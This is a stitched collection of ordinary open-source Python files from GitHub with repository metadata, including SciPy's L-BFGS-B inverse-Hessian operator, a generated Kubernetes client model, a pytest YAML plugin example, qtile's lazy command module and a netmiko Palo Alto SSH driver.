    # Reverse-communication loop: each setulb call mutates `task` to request
    # work (an f/g evaluation, acknowledgement of a new iterate) or to signal
    # termination.
    while 1:
        # x, f, g, wa, iwa, task, csave, lsave, isave, dsave = \
        _lbfgsb.setulb(m, x, low_bnd, upper_bnd, nbd, f, g, factr,
                       pgtol, wa, iwa, task, iprint, csave, lsave,
                       isave, dsave, maxls)
        # NOTE(review): ndarray.tostring() is deprecated in newer NumPy in
        # favour of tobytes() -- confirm the supported NumPy versions.
        task_str = task.tostring()
        if task_str.startswith(b'FG'):
            # The minimization routine wants f and g at the current x.
            # Note that interruptions due to maxfun are postponed
            # until the completion of the current minimization iteration.
            # Overwrite f and g:
            f, g = func_and_grad(x)
        elif task_str.startswith(b'NEW_X'):
            # new iteration
            n_iterations += 1
            if callback is not None:
                callback(np.copy(x))

            if n_iterations >= maxiter:
                task[:] = 'STOP: TOTAL NO. of ITERATIONS REACHED LIMIT'
            elif n_function_evals[0] > maxfun:
                task[:] = ('STOP: TOTAL NO. of f AND g EVALUATIONS '
                           'EXCEEDS LIMIT')
        else:
            # Convergence or an error reported by the Fortran code.
            break

    # Map the final task string onto the documented warnflag values.
    task_str = task.tostring().strip(b'\x00').strip()
    if task_str.startswith(b'CONV'):
        warnflag = 0
    elif n_function_evals[0] > maxfun or n_iterations >= maxiter:
        warnflag = 1
    else:
        warnflag = 2

    # These two portions of the workspace are described in the mainlb
    # subroutine in lbfgsb.f. See line 363.
    s = wa[0: m*n].reshape(m, n)
    y = wa[m*n: 2*m*n].reshape(m, n)

    # See lbfgsb.f line 160 for this portion of the workspace.
    # isave(31) = the total number of BFGS updates prior the current iteration;
    n_bfgs_updates = isave[30]

    n_corrs = min(n_bfgs_updates, maxcor)
    hess_inv = LbfgsInvHessProduct(s[:n_corrs], y[:n_corrs])

    return OptimizeResult(fun=f, jac=g, nfev=n_function_evals[0],
                          nit=n_iterations, status=warnflag, message=task_str,
                          x=x, success=(warnflag == 0), hess_inv=hess_inv)
class LbfgsInvHessProduct(LinearOperator):
    """Linear operator for the L-BFGS approximate inverse Hessian.

    Computes products of a vector with the approximate inverse Hessian of
    the objective function, built from the limited-memory correction pairs
    accumulated during the optimization. Implements the
    ``scipy.sparse.linalg.LinearOperator`` interface.

    Parameters
    ----------
    sk : array_like, shape=(n_corr, n)
        The `n_corr` most recent updates to the solution vector (see [1]).
    yk : array_like, shape=(n_corr, n)
        The `n_corr` most recent updates to the gradient (see [1]).

    References
    ----------
    .. [1] Nocedal, Jorge. "Updating quasi-Newton matrices with limited
       storage." Mathematics of computation 35.151 (1980): 773-782.
    """

    def __init__(self, sk, yk):
        """Construct the operator from the correction-pair histories."""
        if sk.shape != yk.shape or sk.ndim != 2:
            raise ValueError('sk and yk must have matching shape, (n_corrs, n)')
        n_corrs, n = sk.shape
        super(LbfgsInvHessProduct, self).__init__(
            dtype=np.float64, shape=(n, n))
        self.sk = sk
        self.yk = yk
        self.n_corrs = n_corrs
        # rho_i = 1 / (y_i . s_i): the standard L-BFGS curvature scalars.
        self.rho = 1 / np.einsum('ij,ij->i', sk, yk)

    def _matvec(self, x):
        """Multiply the approximate inverse Hessian with vector `x`.

        Uses the two-loop recursion of Section (4) of [1].

        Parameters
        ----------
        x : ndarray
            An array with shape (n,) or (n,1).

        Returns
        -------
        y : ndarray
            The matrix-vector product.
        """
        s, y, rho = self.sk, self.yk, self.rho
        q = np.array(x, dtype=self.dtype, copy=True)
        # Accept column vectors by flattening them.
        if q.ndim == 2 and q.shape[1] == 1:
            q = q.reshape(-1)

        alpha = np.zeros(self.n_corrs)
        # First sweep: newest correction pair to oldest.
        for i in reversed(range(self.n_corrs)):
            alpha[i] = rho[i] * np.dot(s[i], q)
            q = q - alpha[i] * y[i]

        r = q
        # Second sweep: oldest to newest.
        for i in range(self.n_corrs):
            beta = rho[i] * np.dot(y[i], r)
            r = r + s[i] * (alpha[i] - beta)

        return r

    def todense(self):
        """Return a dense array representation of this operator.

        Returns
        -------
        arr : ndarray, shape=(n, n)
            An array with the same shape and containing
            the same data represented by this `LinearOperator`.
        """
        s, y, rho = self.sk, self.yk, self.rho
        eye = np.eye(*self.shape, dtype=self.dtype)
        hess = eye
        # Apply the BFGS inverse-Hessian update once per correction pair.
        for i in range(self.n_corrs):
            left = eye - np.outer(s[i], y[i]) * rho[i]
            right = eye - np.outer(y[i], s[i]) * rho[i]
            hess = np.dot(left, np.dot(hess, right)) + rho[i] * np.outer(s[i], s[i])
        return hess
|
{
"content_hash": "2d138b3301771947f2722aaefa0e70a0",
"timestamp": "",
"source": "github",
"line_count": 468,
"max_line_length": 91,
"avg_line_length": 36.3440170940171,
"alnum_prop": 0.5882767946381328,
"repo_name": "lhilt/scipy",
"id": "5425ffff3f32b4d8dd9a942a020cb6058d2c51a1",
"size": "17009",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "scipy/optimize/lbfgsb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4396416"
},
{
"name": "C++",
"bytes": "643592"
},
{
"name": "Fortran",
"bytes": "5368331"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12378541"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1LocalSubjectAccessReview(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
        """
        V1beta1LocalSubjectAccessReview - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        # Metadata driving to_dict(): attribute name -> Swagger type name.
        self.swagger_types = {
            'api_version': 'str',
            'kind': 'str',
            'metadata': 'V1ObjectMeta',
            'spec': 'V1beta1SubjectAccessReviewSpec',
            'status': 'V1beta1SubjectAccessReviewStatus'
        }

        # Attribute name -> JSON key in the API definition.
        self.attribute_map = {
            'api_version': 'apiVersion',
            'kind': 'kind',
            'metadata': 'metadata',
            'spec': 'spec',
            'status': 'status'
        }

        # NOTE: backing fields are assigned directly, bypassing the property
        # setters, so the `spec` None-check is not enforced at construction.
        self._api_version = api_version
        self._kind = kind
        self._metadata = metadata
        self._spec = spec
        self._status = status

    @property
    def api_version(self):
        """
        Gets the api_version of this V1beta1LocalSubjectAccessReview.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources

        :return: The api_version of this V1beta1LocalSubjectAccessReview.
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """
        Sets the api_version of this V1beta1LocalSubjectAccessReview.

        :param api_version: The api_version of this V1beta1LocalSubjectAccessReview.
        :type: str
        """
        self._api_version = api_version

    @property
    def kind(self):
        """
        Gets the kind of this V1beta1LocalSubjectAccessReview.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds

        :return: The kind of this V1beta1LocalSubjectAccessReview.
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """
        Sets the kind of this V1beta1LocalSubjectAccessReview.

        :param kind: The kind of this V1beta1LocalSubjectAccessReview.
        :type: str
        """
        self._kind = kind

    @property
    def metadata(self):
        """
        Gets the metadata of this V1beta1LocalSubjectAccessReview.

        :return: The metadata of this V1beta1LocalSubjectAccessReview.
        :rtype: V1ObjectMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """
        Sets the metadata of this V1beta1LocalSubjectAccessReview.

        :param metadata: The metadata of this V1beta1LocalSubjectAccessReview.
        :type: V1ObjectMeta
        """
        self._metadata = metadata

    @property
    def spec(self):
        """
        Gets the spec of this V1beta1LocalSubjectAccessReview.
        Spec holds information about the request being evaluated. spec.namespace must be equal to the namespace you made the request against. If empty, it is defaulted.

        :return: The spec of this V1beta1LocalSubjectAccessReview.
        :rtype: V1beta1SubjectAccessReviewSpec
        """
        return self._spec

    @spec.setter
    def spec(self, spec):
        """
        Sets the spec of this V1beta1LocalSubjectAccessReview.
        Spec holds information about the request being evaluated. spec.namespace must be equal to the namespace you made the request against. If empty, it is defaulted.

        :param spec: The spec of this V1beta1LocalSubjectAccessReview.
        :type: V1beta1SubjectAccessReviewSpec
        :raises ValueError: if `spec` is None (required field).
        """
        if spec is None:
            raise ValueError("Invalid value for `spec`, must not be `None`")
        self._spec = spec

    @property
    def status(self):
        """
        Gets the status of this V1beta1LocalSubjectAccessReview.
        Status is filled in by the server and indicates whether the request is allowed or not

        :return: The status of this V1beta1LocalSubjectAccessReview.
        :rtype: V1beta1SubjectAccessReviewStatus
        """
        return self._status

    @status.setter
    def status(self, status):
        """
        Sets the status of this V1beta1LocalSubjectAccessReview.
        Status is filled in by the server and indicates whether the request is allowed or not

        :param status: The status of this V1beta1LocalSubjectAccessReview.
        :type: V1beta1SubjectAccessReviewStatus
        """
        self._status = status

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        # dict.items() works on both Python 2 and 3, so the six.iteritems
        # dependency is unnecessary here.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # Fix: the previous implementation accessed other.__dict__
        # unconditionally, raising AttributeError for objects without one
        # (e.g. strings, ints). Defer to Python's fallback for foreign types.
        if not isinstance(other, V1beta1LocalSubjectAccessReview):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
{
"content_hash": "475ed28c8d0d6f70e7ba51200a20c9a4",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 272,
"avg_line_length": 34.06018518518518,
"alnum_prop": 0.6165556612749762,
"repo_name": "skuda/client-python",
"id": "8bdd22802a3824c6fcc38d1a2fd94fda37321fda",
"size": "7374",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kubernetes/client/models/v1beta1_local_subject_access_review.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5907789"
},
{
"name": "Shell",
"bytes": "8195"
}
],
"symlink_target": ""
}
|
import quiz

def loadProblems(a):
    """Append the thermodynamics quiz problems to app ``a``.

    Each tuple mirrors the positional quiz.Problem(...) arguments used
    throughout this file -- presumably (question, choice, choice, choice,
    answer); TODO confirm against quiz.Problem's signature.
    """
    # Definitions section.
    problem_specs = [
        ("What is an adiabatic wall?",
         "No net heat transfer to or from the working fluid. (Insulated)",
         "B", "C", "A"),
        ("What is a control mass?",
         "A closed system: a volume that has no mass transfer.",
         "B", "C", "A"),
        ("What is Cp?",
         "Specific heat at constant pressure.",
         "B", "C", "A"),
        ("What is Cv?",
         "Specific heat at constant volume.",
         "B", "C", "A"),
        #
        # combustion
        #
        ("What is a Rich mixture?",
         "A",
         "More fuel than stochiometric equilibrium. ",
         "More air than stochiometric.",
         "B"),
        ("What is the Damkoler number?",
         "A",
         "Ratio of the characteristic fluid time divided by the chemical reaction time.",
         "Ratio of the chemical reaction time divided by the characteristic fluid time.",
         "B"),
        ("What is a Rich mixture?",
         "A",
         "More fuel than stochiometric equilibrium. ",
         "More air than stochiometric.",
         "B"),
    ]
    for spec in problem_specs:
        a.problems.append(quiz.Problem(*spec))
def main():
    """Build the quiz app, load the problem bank, and start it."""
    a = quiz.App()
    loadProblems(a)
    a.run()

# steady as she goes
if __name__ == "__main__":
    main()
#
# nick
# 4/20/14
#
|
{
"content_hash": "91b563b440cd8fc12e908050c4167951",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 84,
"avg_line_length": 19.40277777777778,
"alnum_prop": 0.5855404438081604,
"repo_name": "nicholasmalaya/arcanus",
"id": "40206f32c6870837b3251e71891e3f715deb546e",
"size": "1397",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "inspectio/thermo_quiz.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "87967"
},
{
"name": "Makefile",
"bytes": "14290"
},
{
"name": "Mathematica",
"bytes": "166461"
},
{
"name": "Matlab",
"bytes": "62080"
},
{
"name": "Python",
"bytes": "202786"
},
{
"name": "Shell",
"bytes": "10820"
},
{
"name": "TeX",
"bytes": "1106102"
}
],
"symlink_target": ""
}
|
import input_array_choice_mixin
from input_array_choice_mixin import InputArrayChoiceMixin
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
import module_utils
import vtk
# Integrator choices: the list index is stored in _config.integrator and
# passed to vtkStreamTracer.SetIntegratorType; *_TEXTS are the GUI labels.
INTEG_TYPE = ['RK2', 'RK4', 'RK45']
INTEG_TYPE_TEXTS = ['Runge-Kutta 2', 'Runge-Kutta 4', 'Runge-Kutta 45']
# Integration direction choices, same index convention as above.
INTEG_DIR = ['FORWARD', 'BACKWARD', 'BOTH']
INTEG_DIR_TEXTS = ['Forward', 'Backward', 'Both']
# Index of the input array slot used by the InputArrayChoiceMixin helpers.
ARRAY_IDX = 0
class streamTracer(ScriptedConfigModuleMixin, InputArrayChoiceMixin, ModuleBase):
    """DeVIDE module wrapping vtkStreamTracer: traces streamlines through a
    VTK vector dataset, seeded from a source geometry."""

    def __init__(self, module_manager):
        """Set up config defaults, the config GUI description and the
        underlying vtkStreamTracer instance."""
        ModuleBase.__init__(self, module_manager)
        InputArrayChoiceMixin.__init__(self)

        # _config.integrator indexes INTEG_TYPE:
        # 0 = RK2
        # 1 = RK4
        # 2 = RK45
        self._config.integrator = INTEG_TYPE.index('RK2')
        self._config.max_prop = 5.0
        self._config.integration_direction = INTEG_DIR.index(
            'FORWARD')

        configList = [
            ('Vectors selection:', 'vectorsSelection', 'base:str', 'choice',
             'The attribute that will be used as vectors for the warping.',
             (input_array_choice_mixin.DEFAULT_SELECTION_STRING,)),
            # fixed typo: "lenth" -> "length"
            ('Max propagation:', 'max_prop', 'base:float', 'text',
             'The streamline will propagate up to this length.'),
            ('Integration direction:', 'integration_direction', 'base:int', 'choice',
             'Select an integration direction.',
             INTEG_DIR_TEXTS),
            ('Integrator type:', 'integrator', 'base:int', 'choice',
             'Select an integrator for the streamlines.',
             INTEG_TYPE_TEXTS)]

        self._streamTracer = vtk.vtkStreamTracer()

        ScriptedConfigModuleMixin.__init__(
            self, configList,
            {'Module (self)' : self,
             'vtkStreamTracer' : self._streamTracer})

        module_utils.setup_vtk_object_progress(self, self._streamTracer,
                                               'Tracing stream lines.')

        self.sync_module_logic_with_config()

    def close(self):
        """Disconnect inputs, tear down the GUI mixin and drop the VTK object."""
        # we play it safe... (the graph_editor/module_manager should have
        # disconnected us by now)
        for input_idx in range(len(self.get_input_descriptions())):
            self.set_input(input_idx, None)
        # this will take care of all display thingies
        ScriptedConfigModuleMixin.close(self)
        # get rid of our reference
        del self._streamTracer

    def execute_module(self):
        """Run the stream tracer and refresh the array-choice widget."""
        self._streamTracer.Update()
        if self.view_initialised:
            choice = self._getWidget(0)
            self.iac_execute_module(self._streamTracer, choice,
                                    ARRAY_IDX)

    def get_input_descriptions(self):
        return ('VTK Vector dataset', 'VTK source geometry')

    def set_input(self, idx, inputStream):
        # Slot 0 is the vector dataset, slot 1 the seed geometry.
        if idx == 0:
            self._streamTracer.SetInput(inputStream)
        else:
            self._streamTracer.SetSource(inputStream)

    def get_output_descriptions(self):
        return ('Streamlines polydata',)

    def get_output(self, idx):
        # Single output: idx is ignored.
        return self._streamTracer.GetOutput()

    def logic_to_config(self):
        """Copy the vtkStreamTracer state into self._config."""
        self._config.max_prop = \
            self._streamTracer.GetMaximumPropagation()
        self._config.integration_direction = \
            self._streamTracer.GetIntegrationDirection()
        self._config.integrator = self._streamTracer.GetIntegratorType()
        # this will extract the possible choices
        self.iac_logic_to_config(self._streamTracer, ARRAY_IDX)

    def config_to_logic(self):
        """Push self._config into the vtkStreamTracer."""
        self._streamTracer.SetMaximumPropagation(self._config.max_prop)
        self._streamTracer.SetIntegrationDirection(self._config.integration_direction)
        self._streamTracer.SetIntegratorType(self._config.integrator)
        # it seems that array_idx == 1 refers to vectors
        # array_idx 0 gives me only the x-component of multi-component
        # arrays
        self.iac_config_to_logic(self._streamTracer, ARRAY_IDX)

    def config_to_view(self):
        # first get our parent mixin to do its thing
        ScriptedConfigModuleMixin.config_to_view(self)
        choice = self._getWidget(0)
        self.iac_config_to_view(choice)
|
{
"content_hash": "16a82f0b7741dc61405155ca0b7d62dc",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 86,
"avg_line_length": 36.5,
"alnum_prop": 0.620217288615966,
"repo_name": "ivoflipse/devide",
"id": "ced8950c08a0cfdb2b70a7469dc2183de906b042",
"size": "4234",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "modules/filters/streamTracer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "NSIS",
"bytes": "2786"
},
{
"name": "Python",
"bytes": "3102319"
},
{
"name": "Shell",
"bytes": "7369"
}
],
"symlink_target": ""
}
|
# Package metadata. The magic_*_magic values appear to be placeholders that
# a project-template rendering step substitutes -- TODO confirm against the
# template's generation script.
__author__ = 'magic_full_name_magic'
__email__ = 'magic_email_magic'
__version__ = 'magic_version_magic'
|
{
"content_hash": "978bcb275ce8354814745b73c0521c86",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 35,
"alnum_prop": 0.6476190476190476,
"repo_name": "amjith/py-template",
"id": "aeb59022336fdfe24c66416599cbede7b556efe6",
"size": "130",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "magic_repo_name_magic/__init__.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1752"
},
{
"name": "Python",
"bytes": "2264"
}
],
"symlink_target": ""
}
|
import pytest
def pytest_collect_file(parent, file_path):
    """Collection hook: turn ``test*.yaml`` files into YamlFile nodes."""
    is_yaml_test = file_path.suffix == ".yaml" and file_path.name.startswith("test")
    if not is_yaml_test:
        return None
    return YamlFile.from_parent(parent, path=file_path)
class YamlFile(pytest.File):
    """Pytest collector for a single YAML test file."""

    def collect(self):
        """Yield one YamlItem per top-level mapping entry, in sorted order."""
        # We need a yaml parser, e.g. PyYAML.
        import yaml

        document = yaml.safe_load(self.path.open())
        for item_name, item_spec in sorted(document.items()):
            yield YamlItem.from_parent(self, name=item_name, spec=item_spec)
class YamlItem(pytest.Item):
    """A single test item backed by one named entry of a YAML file."""

    def __init__(self, *, spec, **kwargs):
        super().__init__(**kwargs)
        # spec: the mapping loaded from YAML for this named test case.
        self.spec = spec

    def runtest(self):
        # Each key/value pair in the spec is checked independently.
        for name, value in sorted(self.spec.items()):
            # Some custom test execution (dumb example follows).
            if name != value:
                raise YamlException(self, name, value)

    def repr_failure(self, excinfo):
        """Called when self.runtest() raises an exception."""
        # Only YamlException gets custom formatting; other exceptions fall
        # through (implicit None return) -- NOTE(review): presumably pytest
        # then uses its default failure representation; confirm.
        if isinstance(excinfo.value, YamlException):
            return "\n".join(
                [
                    "usecase execution failed",
                    # args == (item, name, value); indices 1/2 skip the item.
                    " spec failed: {1!r}: {2!r}".format(*excinfo.value.args),
                    " no further details known at this point.",
                ]
            )

    def reportinfo(self):
        # (path, line, description) triple used in test report headers.
        return self.path, 0, f"usecase: {self.name}"
# Raised with args (item, name, value) when a spec entry fails.
class YamlException(Exception):
    """Custom exception for error reporting."""
|
{
"content_hash": "3c8705a0a254ea723c615d288b10fee1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 79,
"avg_line_length": 31.02173913043478,
"alnum_prop": 0.5711282410651717,
"repo_name": "pytest-dev/pytest",
"id": "bc39a1f6b204888e14e8ec66815f99793202ded8",
"size": "1452",
"binary": false,
"copies": "10",
"ref": "refs/heads/main",
"path": "doc/en/example/nonpython/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "192"
},
{
"name": "Python",
"bytes": "2748374"
}
],
"symlink_target": ""
}
|
from rfid import RFIDClient

# Controller connection parameters -- adjust for your own installation.
ip_address = "192.168.1.20"
controller_serial = 123106461

client = RFIDClient(ip_address, controller_serial)
# Presumably opens door number 1 attached to this controller.
client.open_door(1)
|
{
"content_hash": "518375c3817e3776d05b6eaae7a25945",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 50,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.7735849056603774,
"repo_name": "pawl/Chinese-RFID-Access-Control-Library",
"id": "9dca995919ed4f6b96b75603ccc93217f8af9a14",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/open_door.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9322"
}
],
"symlink_target": ""
}
|
from typing import Dict, List, Optional, Tuple # noqa: F401
from libqtile.command_client import InteractiveCommandClient
from libqtile.command_interface import CommandInterface
from libqtile.command_graph import CommandGraphCall, CommandGraphNode, SelectorType
class LazyCall:
    def __init__(self, call: CommandGraphCall, args: Tuple, kwargs: Dict) -> None:
        """The lazily evaluated command graph call

        Parameters
        ----------
        call : CommandGraphCall
            The call that is made
        args : Tuple
            The args passed to the call when it is evaluated.
        kwargs : Dict
            The kwargs passed to the call when it is evaluated.
        """
        self._call = call
        self._args = args
        self._kwargs = kwargs
        # Optional restrictions on when the call may fire; configured via
        # when() and consulted by check().
        self._layout = None  # type: Optional[str]
        self._when_floating = True

    @property
    def selectors(self) -> List[SelectorType]:
        """The selectors for the given call"""
        return self._call.selectors

    @property
    def name(self) -> str:
        """The name of the given call"""
        return self._call.name

    @property
    def args(self) -> Tuple:
        """The args to the given call"""
        return self._args

    @property
    def kwargs(self) -> Dict:
        """The kwargs to the given call"""
        return self._kwargs

    def when(self, layout=None, when_floating=True):
        # Restrict the call to a layout name (or the literal 'floating');
        # when_floating=False suppresses the call for floating windows.
        self._layout = layout
        self._when_floating = when_floating

    def check(self, q) -> bool:
        # Decide whether the call should run given current state q.
        if self._layout is not None:
            if self._layout == 'floating':
                # 'floating' matches only while the current window floats.
                if q.current_window.floating:
                    return True
                return False
            if q.current_layout.name != self._layout:
                # Layout name differs: suppress only for a floating window
                # with when_floating disabled.  NOTE(review): a non-floating
                # window in a non-matching layout still returns True below --
                # confirm this fallthrough is intended.
                if q.current_window and q.current_window.floating and not self._when_floating:
                    return False
        return True
class LazyCommandObject(CommandInterface):
    """A command interface that defers all evaluation.

    Command and item lookups always succeed and are resolved at run time;
    execute() hands back a LazyCall instead of performing the call.
    """

    def has_command(self, node: CommandGraphNode, command: str) -> bool:
        """Assume every command exists; resolution happens lazily."""
        return True

    def has_item(self, node: CommandGraphNode, object_type: str, item: str) -> bool:
        """Assume every item exists; resolution happens lazily."""
        return True

    def execute(self, call: CommandGraphCall, args: Tuple, kwargs: Dict) -> LazyCall:
        """Wrap the given call for later evaluation."""
        pending = LazyCall(call, args, kwargs)
        return pending
# Module-level entry point: attribute/call chains on `lazy` build LazyCall
# objects via LazyCommandObject instead of executing commands immediately.
lazy = InteractiveCommandClient(LazyCommandObject())
|
{
"content_hash": "2b0447934ce0f54c2816abe201c19880",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 94,
"avg_line_length": 31.238095238095237,
"alnum_prop": 0.6158536585365854,
"repo_name": "soulchainer/qtile",
"id": "7e8856690c1710feda48d2b545f12884e181049a",
"size": "3735",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libqtile/lazy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1135"
},
{
"name": "Python",
"bytes": "1152583"
},
{
"name": "Roff",
"bytes": "3605"
},
{
"name": "Shell",
"bytes": "5643"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
from netmiko.base_connection import BaseConnection
class PaloAltoPanosSSH(BaseConnection):
    """
    Implement methods for interacting with PaloAlto devices.

    Disables `enable()` and `check_enable_mode()`
    methods.  Overrides several methods for PaloAlto-specific compatibility.
    """
    def session_preparation(self):
        """
        Prepare the session after the connection has been established.

        Disable paging (the '--more--' prompts).
        Set the base prompt for interaction ('>').
        """
        self.set_base_prompt(delay_factor=3)
        self.disable_paging(command="set cli pager off\n")

    def check_enable_mode(self, *args, **kwargs):
        """No enable mode on PaloAlto."""
        pass

    def enable(self, *args, **kwargs):
        """No enable mode on PaloAlto."""
        pass

    def exit_enable_mode(self, *args, **kwargs):
        """No enable mode on PaloAlto."""
        pass

    def check_config_mode(self, check_string=']'):
        """Checks if the device is in configuration mode or not."""
        return super(PaloAltoPanosSSH, self).check_config_mode(check_string=check_string)

    def config_mode(self, config_command='configure'):
        """Enter configuration mode."""
        return super(PaloAltoPanosSSH, self).config_mode(config_command=config_command)

    def exit_config_mode(self, exit_config='exit'):
        """Exit configuration mode.

        Returns the device output; raises ValueError if the device is still
        in configuration mode after sending the exit command.
        """
        output = ""
        if self.check_config_mode():
            output = self.send_command(exit_config, strip_prompt=False, strip_command=False)
            if self.check_config_mode():
                raise ValueError("Failed to exit configuration mode")
        return output

    def commit(self, force=False, partial=False, device_and_network=False,
               policy_and_objects=False, vsys='', no_vsys=False, delay_factor=.1):
        """
        Commit the candidate configuration.

        Automatically enters configuration mode.  Raises ValueError (with the
        device output) if the commit fails.

        default:
            command_string = commit
        force:
            adds 'force' to the commit
        partial:
            commits only the selected scope; required (True) whenever
            device_and_network, policy_and_objects, vsys, or no_vsys is used,
            otherwise ValueError is raised.
        """
        delay_factor = self.select_delay_factor(delay_factor)
        # The scope-limiting options are only valid for a partial commit.
        if ((device_and_network or policy_and_objects or vsys or
                no_vsys) and not partial):
            raise ValueError("'partial' must be True when using "
                             "device_and_network or policy_and_objects "
                             "or vsys or no_vsys.")

        # Select proper command string based on arguments provided
        command_string = 'commit'
        commit_marker = 'configuration committed successfully'
        if force:
            command_string += ' force'
        if partial:
            command_string += ' partial'
            if vsys:
                command_string += ' {0}'.format(vsys)
            if device_and_network:
                command_string += ' device-and-network'
            if policy_and_objects:
                # BUG FIX: previously appended ' device-and-network' here
                # (copy-paste error), so a policy-and-objects commit silently
                # committed the wrong scope.
                command_string += ' policy-and-objects'
            if no_vsys:
                command_string += ' no-vsys'
            command_string += ' excluded'

        # Enter config mode (if necessary)
        output = self.config_mode()
        output += self.send_command_expect(command_string, strip_prompt=False,
                                           strip_command=False, expect_string='100%',
                                           delay_factor=delay_factor)
        if commit_marker not in output.lower():
            raise ValueError("Commit failed with the following errors:\n\n{0}"
                             .format(output))
        return output

    def strip_command(self, command_string, output):
        """
        Strip command_string from output string
        """
        output_list = output.split(command_string)
        return '\n'.join(output_list)

    def strip_prompt(self, a_string):
        """
        Strip the trailing router prompt from the output
        """
        # Drop every line containing the base prompt, then remove the
        # PaloAlto '[edit]' context line.
        new_response_list = [line for line in a_string.split('\n')
                             if self.base_prompt not in line]
        output = '\n'.join(new_response_list)
        return self.strip_context_items(output)

    @staticmethod
    def strip_context_items(a_string):
        """Strip PaloAlto-specific output.

        PaloAlto will also put a configuration context:
        [edit]

        This method removes those lines.
        """
        strings_to_strip = [
            r'\[edit.*\]',
        ]
        response_list = a_string.split('\n')
        last_line = response_list[-1]
        for pattern in strings_to_strip:
            if re.search(pattern, last_line):
                return "\n".join(response_list[:-1])
        return a_string

    def send_command_expect(self, *args, **kwargs):
        """Palo Alto requires an extra delay"""
        return self.send_command(*args, **kwargs)

    def send_command(self, *args, **kwargs):
        """Palo Alto requires an extra delay"""
        # Default the delay up from the base class unless caller overrides.
        kwargs.setdefault('delay_factor', 2.5)
        return super(PaloAltoPanosSSH, self).send_command(*args, **kwargs)
|
{
"content_hash": "2623d1615b18251c4bd03113f1f93c30",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 92,
"avg_line_length": 35.12337662337662,
"alnum_prop": 0.5838417452394158,
"repo_name": "shsingh/netmiko",
"id": "3208a34399c7c57630ec349b41363372b382d912",
"size": "5409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netmiko/paloalto/paloalto_panos_ssh.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "174778"
},
{
"name": "Shell",
"bytes": "5145"
}
],
"symlink_target": ""
}
|
""" Parser for PPAPI IDL """
#
# IDL Parser
#
# The parser is uses the PLY yacc library to build a set of parsing rules based
# on WebIDL.
#
# WebIDL, and WebIDL grammar can be found at:
# http://heycam.github.io/webidl/
# PLY can be found at:
# http://www.dabeaz.com/ply/
#
# The parser generates a tree by recursively matching sets of items against
# defined patterns. When a match is made, that set of items is reduced
# to a new item. The new item can provide a match for parent patterns.
# In this way an AST is built (reduced) depth first.
#
#
